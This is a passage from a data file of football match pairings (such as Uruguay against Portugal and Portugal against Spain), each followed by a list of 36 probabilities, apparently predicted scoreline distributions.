('EGY', 'POL',0.00147271883739862,0.0017742127262848,0.00142683547569167,0.000785285406291783,0.000327634510317412,0.0039631728700922,0.00672194679171078,0.00570055485234734,0.00322290814765091,0.0141044515317733,0.0239225932934483,0.0202875832709457,0.0376470241520491,0.0638532058810843,0.0669905962814743,0.0596028516360596,0.113622907329443,0.0541507860598088,0.0114699391749828,0.00136659551533621,0.000109946867368415,0.101092536324943,0.0963580396847831,0.0857316438734538,0.0306150917084843,0.0544776989671241,0.0484698806884535,0.00486354767793663,0.0129815821964757,0.0230999382183981,0.0205524695533136,0.00049441870163988,0.00178829031796297,0.0049033133343068,0.00920082323767563,0.0128349123001414),
('EGY', 'SEN',0.00182857077623591,0.00153193307649789,0.000818897171600236,0.000296561267289542,8.10757876302545e-05,0.00596070255475128,0.00658265220447361,0.00363474855917126,0.00133800142941564,0.0225947134259963,0.0249522835231107,0.013777923208828,0.0642358518287364,0.0709383277831276,0.121746610438409,0.115373554886142,0.134449854900203,0.0391700756306873,0.00507184490142393,0.000369402682738764,1.77901443095509e-05,0.127411824098462,0.0742392885419622,0.0703530932028481,0.0144190488918243,0.0273285132577627,0.0258979507761839,0.00140026241514494,0.00398088912768021,0.00754500398186301,0.00715004654242932,8.48484730292853e-05,0.000324803079339601,0.000938615960336038,0.00183760097005947,0.00231637936892863),
('EGY', 'COL',0.000175121778937904,0.000233544833453578,0.000185977688556648,0.000100299039284073,4.0828440856749e-05,0.00093078607926487,0.00153020383568388,0.00125782058353891,0.000689281860572985,0.00536849959220262,0.00882576442735787,0.0072547381618834,0.0232229417533637,0.038178304702329,0.0669715394922664,0.0965680220361091,0.110100600874541,0.0313823925802329,0.00397557448465634,0.00028329327501039,1.333857053191e-05,0.158756948579169,0.0905021924599391,0.130497488665268,0.0171974558454709,0.0495949266700736,0.071512227550151,0.001633952059713,0.00706811518913337,0.0203834019200591,0.0293913626700255,9.67843763903776e-05,0.000563613898752286,0.00247735490240717,0.00737462780402358,0.0156516641834934),
('EGY', 'JPN',0.00327745375129103,0.00316794763848484,0.00209005770556086,0.000941921216427175,0.000321545225830621,0.00771479415947645,0.0106936799083794,0.00741139605406131,0.00342437726088497,0.0241785902783636,0.0335145824668667,0.0232277238870609,0.0568327763286025,0.0787774120474839,0.089058527345363,0.0697785838146103,0.123446376514548,0.0545977255537999,0.0107321871508107,0.0011866549371397,8.82530033405822e-05,0.0967219376627033,0.0855561411625178,0.067034415961227,0.0252264497159099,0.0395305421797618,0.0309727247120386,0.00371904200342854,0.00874176202599671,0.0136985820987786,0.010733027904382,0.000349213918257638,0.00111099866491841,0.00267735964757797,0.00440733345577508,0.00505484533292875),
('URU', 'POR',0.0021250894288508,0.00223369604337706,0.0015695031236817,0.000752907634668721,0.000273523616961012,0.00558338879257647,0.00823337002366088,0.00607054106966788,0.00298391130829956,0.0190433599654745,0.0280816964238613,0.0207048985964556,0.0487136359629131,0.0718340429048824,0.0830742170509644,0.0708356644111405,0.122502801401886,0.0529639147033596,0.0101772775029656,0.00110003292049449,7.9883747060435e-05,0.104455601720628,0.0903224663682557,0.0770160964926483,0.0260338612656506,0.0443970686791663,0.0378564609988012,0.00375190115843287,0.00959750524760803,0.0163671879203303,0.013955962174971,0.000343922278279642,0.0011903444671189,0.00312002891805194,0.00558323603278353,0.00706699599761652),
('URU', 'ESP',0.000581508523216559,0.00081041374610045,0.000725883441343848,0.000444174495433371,0.000205888738363372,0.00196262524937624,0.00369422904704467,0.00347680441193904,0.00218145089993796,0.00831243332567399,0.0156464065939672,0.0147255340110587,0.0264046388182369,0.0497011763860958,0.0559166350618525,0.0592068329009087,0.105251299260592,0.046776003094875,0.00923923971972177,0.00102653057197417,7.67330022790009e-05,0.111444404353593,0.099056711690437,0.104885320267963,0.0293486609992845,0.0621511385915105,0.0658081816460947,0.00434773115194212,0.0138106696617047,0.0292466100653485,0.0309675135698295,0.000410345647312965,0.00176436362296361,0.00574670105494954,0.0127872087080905,0.0218297673438605),
('URU', 'MAR',0.00383247921911008,0.00313236235503786,0.00171963940235727,0.000642042944348364,0.00018124592379657,0.00959488010053665,0.0109675864286023,0.00626834055290248,0.00238837678906224,0.0303472382809592,0.0346889127564182,0.0198258677953142,0.0719879921607729,0.0822870653485981,0.113843879682697,0.0900179915579777,0.130131130009384,0.047029795667604,0.0075540953886782,0.000682518400012178,4.10989185907276e-05,0.102896554432827,0.0743742704689857,0.0588088043895561,0.0179193953198402,0.0283382467484655,0.022407458913744,0.00215870842566862,0.00512076531596386,0.00809812543753075,0.00640330415041084,0.000163817160093642,0.00052450105622549,0.00126972836533045,0.00209043455034762,0.00226005371523376),
('URU', 'IRN',0.00179328045486061,0.00118672135179768,0.000488469176676053,0.000135609106195915,2.83688786382893e-05,0.00657125147564419,0.00553774180583047,0.00233338995027855,0.000655466777008687,0.0263224763287367,0.0221825443964368,0.00934686519905223,0.0790800005118865,0.0666424997525815,0.158385465026398,0.158611250437825,0.13347500310458,0.0280805686932518,0.00262560469433155,0.000138094158579517,4.75892563887443e-06,0.133665277562443,0.0562411975454892,0.056321371833735,0.00788804282616351,0.0157985751527943,0.0158210967130286,0.000553164071382581,0.00166185789291927,0.00332845388813882,0.00333319874481128,2.39411743791653e-05,9.65818265637534e-05,0.000293593884899362,0.000601952023128897,0.000746131464526927),
('URU', 'FRA',0.00113627593515345,0.00132867127241996,0.00101020446152507,0.000523839273414125,0.000205624983618133,0.0034943185073275,0.00556398316425182,0.00442974911805546,0.00235115463983756,0.013454001664799,0.0214227290951819,0.0170556438641711,0.0388509577225515,0.0618621554474903,0.0747929601697944,0.0719929085263368,0.119092398222041,0.0492513762973219,0.00905253438467099,0.000935932486204147,6.48739940276348e-05,0.114633892172703,0.0948150687048553,0.0912654419973568,0.0261408939454039,0.0503244953090698,0.0484404786118239,0.00360357454568748,0.0104059985878305,0.020032850759166,0.0192828735345181,0.000315157899173703,0.00123055969855702,0.00363719202890447,0.00733207349624698,0.0106601450424911),
('URU', 'AUS',0.0276815124663855,0.0159735505408092,0.00730811262659432,0.00228943198492292,0.000543821256231579,0.0348372567579993,0.0336520173966597,0.0162535512301073,0.00523352333731498,0.0691737170928969,0.0668202765554228,0.0322734525957812,0.103014780333186,0.0995099931078657,0.102274345547005,0.0507696163756152,0.0987947495260092,0.0480622231892363,0.0103918131456023,0.00126386686828253,0.000103911878869983,0.049042323434426,0.0477167684706474,0.0236868983808399,0.015475680553932,0.015364446688414,0.00762700616681882,0.00250956525644307,0.00373729104765465,0.0037104286858769,0.00184187970075516,0.000260771729175888,0.000526424874191026,0.000805783213817853,0.00084453717738115,0.000575255597105603),
('URU', 'PER',0.00436305880543275,0.00348282575409571,0.00188125969664677,0.00069124019645453,0.000192056408868046,0.0105277406441522,0.0118458525917039,0.00666449850767948,0.0024996394316082,0.0323923412490602,0.036447981813617,0.0205057017656033,0.0747499254869842,0.0841088917831117,0.11499737581687,0.0884575894799322,0.129395471298591,0.0473198175844001,0.0076910304124214,0.000703150876339472,4.28655001484327e-05,0.0995328058522016,0.0727981307123376,0.0559973400759442,0.0177481444093921,0.0273042417019442,0.0210028045107541,0.00216349394479199,0.00499256938303078,0.0076807083604673,0.00590810826976829,0.000166229125845236,0.000517828106220209,0.00121978616299552,0.0019545420366491,0.00205145578186422),
('URU', 'DEN',0.00583145451841488,0.00458856627466476,0.00250304158077281,0.000930475886003374,0.000261749381093957,0.0125796398524789,0.0143473816036798,0.00818176677931868,0.00311050055358736,0.0359831271089967,0.0410396213230826,0.0234033372536,0.0771953004056234,0.0880430955034004,0.110405716669439,0.0789518416875315,0.125920373465386,0.0502076332697074,0.00889735621248992,0.000886900160579341,5.91710671189245e-05,0.0900464730539259,0.071807606218145,0.0513500833935069,0.0190876708285666,0.02729943359641,0.0195220014369025,0.00253691215212551,0.00544248683814479,0.00778391503980199,0.00556632796263307,0.000213481777054422,0.000618949781798374,0.00135798039977065,0.00203038124005024,0.00200565407274435),
('URU', 'ARG',0.00143657403097549,0.00160438720995023,0.00117507244536988,0.000587041035724286,0.000222015161700049,0.00419432107347681,0.00643507745826043,0.0049364630375668,0.00252456607081264,0.0154791411437956,0.0237486521662733,0.0182180159246335,0.0428443256403348,0.0657332973114396,0.0790584879149153,0.0729413337469905,0.12129436076855,0.0504251882933868,0.00931691061613295,0.000968319897879734,6.74876850354345e-05,0.111909203980329,0.0930470740224935,0.0858475523559209,0.025788042675707,0.0475853833560483,0.043903462112601,0.00357358440354244,0.00989123443389256,0.0182517994219357,0.0168395655954277,0.000314267837302378,0.00117625928979427,0.00333285600962018,0.00644137231965093,0.00888209294034763),
('URU', 'ICE',0.0200150988470724,0.0126694041074292,0.00617035975600529,0.00205698920006615,0.000519871698612417,0.0280626480094633,0.0288359920724826,0.0148153238875368,0.00507453373642441,0.0600681441033644,0.0617234883389925,0.0317122250870438,0.0964319707500287,0.0990894210390976,0.103206395797553,0.0552283648808346,0.106050534149313,0.0509100523690201,0.0108620477880111,0.00130359414537194,0.000105683889153262,0.0567503355828316,0.0544865253090315,0.0291571242034147,0.017437673332748,0.0186626841883503,0.00998687653071241,0.00279034540682327,0.00447955419082421,0.00479424654727023,0.00256552314994804,0.000285863033276963,0.000621950263226299,0.00102587855764716,0.0011582531171932,0.000858361834943284),
('URU', 'CRO',0.00378420089590766,0.00322884348626565,0.00186143896572216,0.000730702746000468,0.000216984537356924,0.00924547675167107,0.0111254363973376,0.00669383193294123,0.00268498147525471,0.0289949169050063,0.0348906943943621,0.0209926546661456,0.0681986361203276,0.0820660317386806,0.106939525156788,0.0838437738005631,0.128684427796358,0.0493766000939623,0.00842042188386018,0.000807735269724645,5.17708650251994e-05,0.100892425321639,0.0774254511276227,0.0607038604410606,0.0198055848864278,0.0310563372480077,0.0243490936721321,0.00253315406614114,0.00595820477635717,0.00934282011807895,0.00732504932569208,0.000204714731986484,0.000650401240266022,0.00156318267404656,0.00255816313610443,0.0027908901151225),
('URU', 'NGA',0.010648617077324,0.00650534097709294,0.00281198098655606,0.000826042917868501,0.000183417587757285,0.0207749693027168,0.0186702273680968,0.00838935992870147,0.00251314061422261,0.0536190332346145,0.0481868120795191,0.0216524685201514,0.103790793254219,0.0932755991373705,0.133939114707072,0.0864223400074306,0.120369550906417,0.0419128572084682,0.00648627529378056,0.000564632683589556,3.27093502201817e-05,0.0776667687980984,0.054087369537644,0.0348991185324225,0.0125555351783575,0.0162025668533403,0.0104544795943658,0.00145728536035809,0.00282087897570826,0.00364026539210208,0.00234883031832462,0.00010635766417454,0.000277752667647033,0.00054827168768714,0.000735497698956272,0.000618264121686133),
('URU', 'BRA',0.000347456586308457,0.000497892586714147,0.000446193249781128,0.000272422315805345,0.000125851605147332,0.00138386170452258,0.00259155851328758,0.00242660646863927,0.00151476905330661,0.00657879161790792,0.0123201063869429,0.0115359347279233,0.0234563715852592,0.0439267589195893,0.0557550585681082,0.0662640115636374,0.10441252635203,0.0411308318118631,0.00720111693125999,0.000709177192874849,4.67190702888581e-05,0.124092647936649,0.0977666954281453,0.116194182245822,0.0256752431721268,0.0610292466423909,0.0725323012671831,0.00337138382892538,0.0120205102153631,0.0285723752559111,0.0339578193079193,0.000280104789249438,0.00134947931292185,0.00491935679014559,0.0122175116481198,0.0230501101004238),
('URU', 'SWI',0.00417278388637236,0.00353334588513754,0.002036294495695,0.000799480155666781,0.000237499681150964,0.00984424985147461,0.0118543519161594,0.00713744883928875,0.00286494930546818,0.0301564333316485,0.0363140898131523,0.0218645405518452,0.0692848986723403,0.0834322151234649,0.106122125059101,0.0812724391812917,0.12779125230683,0.0502341394286187,0.00877635716610363,0.000862486167086895,5.66935431897141e-05,0.0978674972370166,0.0769425044827033,0.058925554049584,0.0201638240928049,0.0308844770368497,0.0236525303298014,0.00264210142871667,0.00607027123391829,0.00929769827729734,0.00712053794010267,0.000219025951241456,0.000679943422405839,0.00159712247102138,0.00255573800037784,0.00273128626313923),
('URU', 'CRC',0.0106720164726132,0.00579705989812865,0.00219420474327554,0.000562817723467261,0.000108993775862727,0.022115084965324,0.0173032426818984,0.0067691851009871,0.00176544430712832,0.0583352815924772,0.0456425799807786,0.0178557902733294,0.115407822889087,0.0902971691029249,0.152211665855361,0.100376173133125,0.119093161859473,0.0353250695831871,0.00465689781222405,0.000345328893552927,1.694233363372e-05,0.0785361343140227,0.0465903225024955,0.0307240463571467,0.00921299123367967,0.0121510371488155,0.00801301662223144,0.000910910280426928,0.00180210276596858,0.002376797839036,0.00156738230314239,5.62371469522039e-05,0.000149834191422626,0.000301399060748057,0.000410860239010172,0.000340481608249494),
('URU', 'SRB',0.0096595037582777,0.00722106569130392,0.0039100945536351,0.00144692965135907,0.000405659119403483,0.0172085791664037,0.0195956631222907,0.0111569354299735,0.00423485568930131,0.0434810446743003,0.049512507418759,0.0281903115398424,0.0823979086689878,0.093827714923207,0.104097703629704,0.0657561100519544,0.118537591767841,0.0534215020133396,0.0107002412944826,0.00120557317162297,9.14485557028359e-05,0.0748774531790504,0.0674902527730207,0.042632030621573,0.0202772843091331,0.0256173823647279,0.0161819075280483,0.00304613067857543,0.00577251074179943,0.0072927228628229,0.00460664424310462,0.000291790507001364,0.000748630034432152,0.00145518096372339,0.00193304051277333,0.00171121391667548),
('URU', 'GER',0.000900436069028623,0.00121353454134058,0.00107719265884381,0.000654742056784435,0.000301758878973919,0.00264210418189229,0.00495209815477383,0.00464086092868425,0.00289945655171445,0.0101643692803531,0.0190510861390886,0.017853733619287,0.0293273076366896,0.0549681980852546,0.0564121556713816,0.0542554288807434,0.105733352197711,0.0515134706221681,0.0111544227914803,0.00135861348106535,0.000111875256105027,0.101690997307443,0.0990880567664311,0.0952997621317545,0.0321839141901072,0.0619069435182442,0.0595401422141051,0.00522668607296319,0.0150805845551558,0.0290080594536604,0.0278990350204765,0.00054396363663162,0.00212759940469789,0.00630990495627903,0.0128141966919603,0.0200666126546929),
('URU', 'MEX',0.00533740562516029,0.00434548627063021,0.00244645883855784,0.000938977885771343,0.000272764323102816,0.0116713532741094,0.0137494645659721,0.00809879417626264,0.00318026770156527,0.0338667638077044,0.0398968189893739,0.0235002696819345,0.073703387079659,0.0868264446499008,0.106932552868215,0.077571542611434,0.125972139826489,0.0511430464002576,0.00922818224799222,0.000936630419926902,6.36794137491901e-05,0.0913833341699696,0.0742008845146606,0.053827173489711,0.0200830611429924,0.0291375075491111,0.0211370751731926,0.00271782032998191,0.00591472409147206,0.00858137694443617,0.00622514500453841,0.000233101264480887,0.000685755805303622,0.00152689476539104,0.00231775026550794,0.00234351252531607),
('URU', 'SWE',0.00467487121734737,0.00412618323522396,0.00252412728901639,0.00105447903305317,0.000333648527495749,0.0101736903696318,0.0130687505840534,0.00839381952973554,0.00359413119841979,0.0298690510965662,0.0383686906895219,0.0246435084340098,0.0657696603441234,0.0844853003980661,0.0965469399032596,0.070863309586154,0.124020668155537,0.0542633635783192,0.0105520498966442,0.00115422237388705,8.48744119247569e-05,0.0910284159331578,0.0796562073596419,0.0584658870414867,0.0232349107908659,0.0341078169485144,0.0250343801072544,0.00338869434884129,0.0074616791679386,0.0109534135714712,0.00803956228667728,0.000314577520186565,0.000937378294361401,0.00211556643657804,0.00326063659503991,0.00343270687236077),
('URU', 'KOR',0.0179045682436811,0.0105195690813887,0.00461821683942147,0.00138237394904744,0.000313195217480307,0.0280647246810906,0.0257880604692493,0.0118480418091138,0.00362896865593799,0.0631453102109061,0.0580228417193607,0.0266579588408492,0.106557170441034,0.0979130487111809,0.119876208641895,0.0674300253041501,0.110151621026393,0.0449850773450446,0.00816513805600444,0.000833644942216325,5.70290257724529e-05,0.0619599725187421,0.0506079552907281,0.0284668304453906,0.013778600573855,0.0155008470133766,0.0087191822146305,0.00187569160503723,0.00316521352710449,0.00356084715463888,0.00200296636389947,0.000161880053497948,0.000369302268977146,0.000637689069783616,0.00075077675880195,0.000561932441445224),
('URU', 'BEL',0.00305354049426917,0.00347183470772687,0.00277992528435872,0.00153092978516585,0.000640460667926457,0.00629941830632596,0.0107476711815638,0.00916850018604235,0.00521423939142308,0.0189018128534547,0.0322490838686455,0.0275106789605329,0.0425370857799967,0.0725740995047552,0.0638176412207323,0.0478722420247853,0.108881644315422,0.0619106812601974,0.0156456631957298,0.00222405179795313,0.000215735602011973,0.0816766074242043,0.0928835055797916,0.0696757444206781,0.0352093697361974,0.0528239977946353,0.0396254571427184,0.00667341154644132,0.015018002854912,0.0225312453938113,0.0169016154777898,0.000819689564582008,0.00250766291299112,0.0058277907558048,0.00931508472353985,0.0112500670764669),
('URU', 'TUN',0.0171117807484198,0.00984512646700713,0.00419335511614032,0.00121648357793156,0.000266989517282345,0.0277956460110205,0.0247249992060101,0.0109967867898235,0.00326064910237195,0.063639022984161,0.0566086786445179,0.0251774960363225,0.109277688080343,0.0972055389520301,0.125097385767606,0.0716036191870366,0.111277599468336,0.0432335134872529,0.00746536069306898,0.000725109486889238,4.7084143085878e-05,0.0636934081994351,0.0494922578415782,0.0283285279020808,0.0128191370478376,0.0146749126985751,0.00839967081665326,0.00166016142542186,0.00285074462025322,0.00326343561754849,0.0018679351272332,0.000135937871162437,0.000315354301369559,0.000553478053892721,0.000661616483116979,0.000498386178912027),
('URU', 'PAN',0.035809870620996,0.0152922950293452,0.00511642383425474,0.00116394175799069,0.000200187121175946,0.0474026663423938,0.0330079290874362,0.011492216226525,0.00266746076773162,0.0923057110144423,0.0642752950123656,0.0223784287208417,0.134807990931436,0.0938709348740798,0.131253665811474,0.0638965267189242,0.0913959493813653,0.0326826041737223,0.00519426187949247,0.000464358667236297,2.76554109397211e-05,0.0444931094727365,0.0318209000551621,0.0154909577422039,0.00758596624900669,0.0073859559216386,0.00359560951668691,0.000904230927335652,0.00132058518711931,0.00128576685720283,0.000625933270797732,6.78605617789514e-05,0.000133750028190767,0.000199301451965109,0.000201928646304046,0.000123894748613112),
('URU', 'ENG',0.000887092116665129,0.000967959022855928,0.000667487426041751,0.00031268864878379,0.000110703469421905,0.00316155862148747,0.00452916227072548,0.00324417689666497,0.00154917298280989,0.0132721080121193,0.0190132583507822,0.0136189365240052,0.0417868697471325,0.0598627248548024,0.087709879077202,0.0920507199305746,0.125650769967205,0.0428788498483747,0.00650337179186523,0.000554825693953815,3.14752021628441e-05,0.131869339657072,0.0900019254356452,0.0944562017261115,0.0204756885444044,0.0429780975966833,0.0451051223265169,0.00232913806753631,0.00733322762008523,0.0153923113096408,0.0161540906492509,0.000166439556911988,0.000706810112021222,0.00226844913976989,0.0049458193479956,0.00745072839952362),
('URU', 'POL',0.010301821993869,0.00888295033171935,0.00578054886316639,0.00258958067276624,0.000881604067403207,0.0155558228010689,0.0216108868025578,0.0150114344437273,0.00695153222592886,0.0368971657542466,0.0512592925907748,0.035605920172937,0.0656378414423762,0.0911872023431613,0.0778438513481877,0.0461598451408442,0.10814437019977,0.0633407931191073,0.016488477663069,0.0024143495647906,0.000241710697861625,0.0641274460965085,0.0751196440268192,0.0445444447475175,0.0293320112900576,0.0347865907292387,0.0206277517521231,0.00572664379248719,0.010187355303977,0.0120817954169038,0.00716426276204052,0.000726261821990106,0.00175739223994047,0.00323167713570763,0.00409105909037608,0.00369537567171409),
('URU', 'SEN',0.0115367995984059,0.00702855235875323,0.00305459392471747,0.000902656746635152,0.00020166769329146,0.0217562906605326,0.0196795814864296,0.00890055050109227,0.00268365460505756,0.0549643469670492,0.0497178200946116,0.022486045694694,0.104145031590609,0.0942040473522523,0.131554218974118,0.0830885173568414,0.118996938061747,0.0426059813032196,0.00677989300444898,0.000606872746665742,3.61902307004503e-05,0.0751574463415704,0.0538191453626326,0.0339917110106004,0.0128463669649816,0.0162273105775836,0.0102490303016863,0.00153318250491536,0.00290503479472433,0.00366959016359892,0.00231768170096217,0.000115213551914767,0.000294616524713386,0.000569580599448301,0.000748746532224263,0.000618519586346625),
('URU', 'COL',0.00140561038365464,0.00141512789118406,0.000916334958424117,0.000403283551023845,0.000134163823725386,0.0044890183829791,0.00604474991353426,0.00406982088285898,0.00182675790346808,0.0172560449071251,0.0232363664082535,0.0156446256011906,0.0497499219928186,0.0669914469062282,0.0956207810697716,0.091892945819222,0.128759487886078,0.0451041306078611,0.00702216247013256,0.000614961542645132,3.58478653937246e-05,0.123739719668182,0.0866914363970106,0.083311717167508,0.0202451973780935,0.0389118516906305,0.0373948491021383,0.00236394754725796,0.00681536277311368,0.0130993232860354,0.012588638071402,0.000173617008265986,0.000675342669804722,0.00198575094592709,0.00396846956885038,0.00539942748091806),
('URU', 'JPN',0.0203327590877199,0.0138572875398012,0.00740426710197227,0.00271735481976303,0.000757144131058935,0.0265282313743894,0.0301188704872249,0.0170977542118016,0.00647065431866432,0.0554117368366065,0.062911805227436,0.0357135100154463,0.0868073488178404,0.0985568641755738,0.0906608868923963,0.0473427453092926,0.102931984874242,0.0559483477401525,0.013515797159875,0.00183661696704365,0.000169815415345576,0.053750662618875,0.0584319979283134,0.0305129509610529,0.0211736824288343,0.022113621184357,0.0115476427760933,0.00383629555288481,0.00600989366584157,0.00627668391321972,0.00327765873549399,0.000448892572501662,0.000955155473451915,0.00154302745940767,0.00171211789109054,0.00128508974878403),
('POR', 'ESP',0.00111618094160677,0.00135131901175885,0.00106969107790792,0.000578198670644631,0.000236701688584238,0.00334887318725615,0.00556542426861239,0.00462453272454873,0.00256180563999233,0.0127764699792357,0.0212329557178293,0.017643308724867,0.0365581591186027,0.0607552614260584,0.0697375201086139,0.0665148605420975,0.115895366931862,0.050483966916573,0.00977368536275216,0.00106435317814789,7.79026594219663e-05,0.110539694513683,0.0963020770981773,0.0918518355416595,0.0279660927664174,0.0533474880485705,0.0508822327248712,0.00406067225228451,0.0116190702571817,0.0221642764635622,0.0211400370373685,0.000375191608566285,0.00145271563139054,0.00426003978080691,0.0085303122455014,0.0125316799350002),
('POR', 'MAR',0.00656877846921711,0.00462655922688769,0.00224431621668885,0.000740118034824348,0.000184512207473181,0.0144940308523454,0.0146276255049798,0.00738122576437424,0.00248308671224478,0.041294307508456,0.0416749261730337,0.0210295265415476,0.0882373500843791,0.0890506530401949,0.125696581759587,0.0895291543260075,0.126855154647183,0.0449357261936238,0.00707445342915111,0.0006264934663988,3.69463591800583e-05,0.0903543641240737,0.0640122031772484,0.0455935900306731,0.0151166362035691,0.0215340725517578,0.0153379453742123,0.00178491505344935,0.00381399238647693,0.00543313920214963,0.00386982964289587,0.000132632749005498,0.000382430322554107,0.000833606412384645,0.00123526686421577,0.00117142337391639),
('POR', 'IRN',0.00304321477488778,0.00174435437699094,0.000634217630531807,0.000155491013768641,2.87232261060675e-05,0.00986853498615754,0.00734260961930399,0.00273160687463336,0.000677477218991933,0.0356084217286785,0.0264941797622416,0.00985639811029083,0.0963638245027737,0.0716987826196569,0.173853753728201,0.156828186517835,0.129354584674157,0.026673471376143,0.00244452642254147,0.000126017963963422,4.25455455914727e-06,0.116686838777903,0.0481226554428701,0.0434099846663464,0.00661539893481041,0.0119351005749385,0.0107662914313708,0.000454707898638777,0.00123053452012905,0.00222005557085799,0.00200264464632034,1.92784014261768e-05,7.00456064117408e-05,0.00019175721668449,0.000353985871182135,0.000387798260870236),
('POR', 'FRA',0.00209174052898066,0.00211979736232595,0.00142428465277365,0.00065238203695742,0.000226159926720481,0.00570371235532754,0.00801851733500262,0.00563638348554528,0.00264128786481508,0.0197818993385425,0.0278102212881089,0.019548385998171,0.0514564265861048,0.0723395961916942,0.0892318710722372,0.0773696051525126,0.125445895664625,0.0508490146359142,0.00916064615654783,0.000928308232048613,6.3009411009708e-05,0.108769426203314,0.0881785428793739,0.0764563038242028,0.0238285570242123,0.0413216942817428,0.0358284896684854,0.00321960485689174,0.00837479546931731,0.0145229414313095,0.0125922972441523,0.000275678243255217,0.000969338963785294,0.0025796293416304,0.00467995523281355,0.00590086414372685),
('POR', 'AUS',0.0435402970950431,0.0212590315940628,0.00859662689076492,0.0023790516125157,0.00049910341654176,0.0474593482332887,0.0404764171647264,0.0172604598196294,0.00490694737090301,0.0848868302983812,0.072397006761644,0.0308724366878938,0.113872833693678,0.0971181546290575,0.101837722905884,0.0455372957282935,0.0868538298331101,0.0414143376106973,0.00877667360094018,0.0010462409208283,8.4218896977319e-05,0.0388371658496373,0.0370372959126868,0.0165614297808979,0.0117736130543516,0.0105292711609822,0.00470822128558547,0.00187132943884973,0.00251032563269455,0.00224501171959576,0.00100386928999971,0.000190339705280596,0.000346004353696857,0.000476809200780203,0.000449675137709625,0.000269680375838267),
('POR', 'PER',0.00743945012028227,0.00511335378495333,0.00244054887965644,0.000792063761471612,0.00019434850963691,0.0158083121295312,0.0157047051537832,0.00780088860677684,0.00258325397641234,0.0438141153696909,0.0435269596030705,0.0216208429212969,0.0910759806248923,0.0904790726919951,0.126212510539071,0.0874522443089747,0.125385319349311,0.0449430384335926,0.00715971362561268,0.000641580861139298,3.83041274458508e-05,0.0868790861829844,0.0622817747669393,0.0431548422549508,0.0148828279184466,0.0206245275935545,0.0142906691116834,0.0017781972951072,0.00369632163128077,0.00512233883887836,0.00354925217522132,0.000133780881516122,0.000375306271177586,0.000796023751610117,0.00114804046726903,0.00105736719665303),
('POR', 'DEN',0.00987268786600368,0.00667462710283954,0.00321746999596646,0.00105647818014102,0.000262465592231622,0.0187194223563943,0.0188499422167252,0.00949068605881704,0.00318561973405251,0.0482330274169695,0.0485693288199692,0.0244539875304649,0.0932090033087261,0.0938588965512534,0.120082562552003,0.0773520868005348,0.12091982980278,0.0472566605644316,0.00820816374817828,0.000801957811091824,5.2394789413241e-05,0.077891418804124,0.0608814674203891,0.0392172556311532,0.0158620514393285,0.0204353197282601,0.0131635650657647,0.00206634864865004,0.00399316212030351,0.00514445089068715,0.00331383677513702,0.0001702480104664,0.000444508291995085,0.000878099051774409,0.00118158692787657,0.00102375238327666),
('POR', 'ARG',0.00261627518929202,0.00252973994784021,0.00163735981471019,0.000722545938987142,0.000241332680294864,0.00676632943933865,0.00916554688825786,0.00620774162077041,0.0028029646603059,0.0224936384495188,0.0304694738476606,0.0206366977631654,0.0560825232388249,0.0759683667438313,0.0932189315034421,0.0774730583504458,0.126272670467492,0.0514526844766674,0.00931803191389716,0.000949211247046322,6.47818708972263e-05,0.104943596857612,0.0855233322772154,0.0710773445369584,0.0232322904328725,0.0386161172047756,0.0320933597202062,0.00315550917150788,0.00786750960003989,0.0130771726404969,0.0108682704542549,0.000271686438591029,0.000915733524158128,0.00233614395656068,0.00406334012828488,0.00486641262113992),
('POR', 'ICE',0.0320991221287565,0.0172592245682845,0.0074293398612619,0.00218787126036516,0.000488362364922001,0.0391300426454616,0.0355001107505199,0.0161034562972212,0.00486986846395897,0.0754479197208131,0.0684489288767962,0.0310496027042097,0.109105208019595,0.0989839700213912,0.105184666553638,0.0507025021024337,0.0954271209398678,0.0449008186641101,0.00938975324531905,0.00110452773702164,8.76725139803753e-05,0.0459990411018279,0.0432873711979136,0.0208659503431695,0.0135785185976518,0.0130905937206028,0.00631010086724485,0.00212967618735487,0.00307972392473575,0.0029690583976744,0.00143118473996939,0.000213569156348256,0.000418421942496348,0.000621354227857831,0.000631257651560429,0.00041131600365626),
('POR', 'CRO',0.0065237867033811,0.00479641009838532,0.00244343114132233,0.00084721467126637,0.000222181677438246,0.0140484449392595,0.0149255085047595,0.0079286641720429,0.00280788716100763,0.0396864447232377,0.0421641235596838,0.0223982436314749,0.0840847813537585,0.0893343088607014,0.118768519992411,0.0838793959744136,0.126183400576283,0.0474557857624878,0.00793219883668434,0.000745796845900466,4.68116340049062e-05,0.089116100992185,0.0670306011307204,0.0473398703209059,0.0168061717165257,0.0237384709738662,0.0167651209829951,0.00210685420539891,0.00446385098087368,0.00630512401803781,0.00445294758417947,0.000166710545912881,0.000476983254591363,0.00103220177528023,0.00152032220311102,0.00145265321997096),
('POR', 'NGA',0.0173139678298409,0.00904957303220403,0.00345635409517828,0.000896792788103126,0.000175851637422987,0.0295544456360534,0.0234501255299636,0.00930331081392742,0.00246058646153647,0.0687104494813958,0.0545186563605637,0.0216290528863882,0.119807505258435,0.095061875710325,0.139268853811785,0.0809457370813705,0.110503581915151,0.0377136649080216,0.00572056075224645,0.000488091217400217,2.76923032770818e-05,0.0642268076704499,0.043839815155588,0.0254805439561952,0.00997469988304372,0.0115949749294212,0.00673922249242054,0.00113475202169175,0.00197861911589829,0.0023000229894349,0.00133681760916561,8.10977399911949e-05,0.000190729019918824,0.000339004320824625,0.000409333632369768,0.000303563458716561),
('POR', 'BRA',0.000672715525300177,0.000839029578412675,0.000664441014336737,0.000358329591111596,0.000146193678517792,0.00238558163711663,0.00394435276223263,0.00326082295212008,0.00179716284116104,0.010215722935926,0.0168908136923896,0.0139637492608425,0.0328099215344003,0.0542483655219889,0.0702505969047492,0.0752081403227252,0.116153281714832,0.0448474885671668,0.00769595027493294,0.000742863302855062,4.79242176499973e-05,0.124350150675568,0.0960246990599812,0.102801105749214,0.0247171469152916,0.0529228429504488,0.0566575769354896,0.00318114692163987,0.0102169157819806,0.0218758350719356,0.0234195999216585,0.000258776533616526,0.00112272984713826,0.00368506645344587,0.00823687470725693,0.0133765700388659),
('POR', 'SWI',0.00717470818421311,0.00523144580875466,0.00266420225070838,0.000923932898494068,0.00024239595145725,0.014909933895814,0.0158519992922491,0.00842679395218562,0.00298641010526721,0.0411428572599672,0.0437424168828281,0.0232531132033566,0.0851479984087626,0.0905279674573929,0.117479794645071,0.0810441960337834,0.124902607521961,0.048123931537558,0.00824077729246192,0.000793775666710909,5.1095983985508e-05,0.0861648714974595,0.0663972107412917,0.0458045451958018,0.0170548605156859,0.0235308116282968,0.0162328825667361,0.00219036510692318,0.00453311259984797,0.00625439408189681,0.00431463420222318,0.000177783899537099,0.000497020799053857,0.00105115894106518,0.00151387492199861,0.00141687916885566),
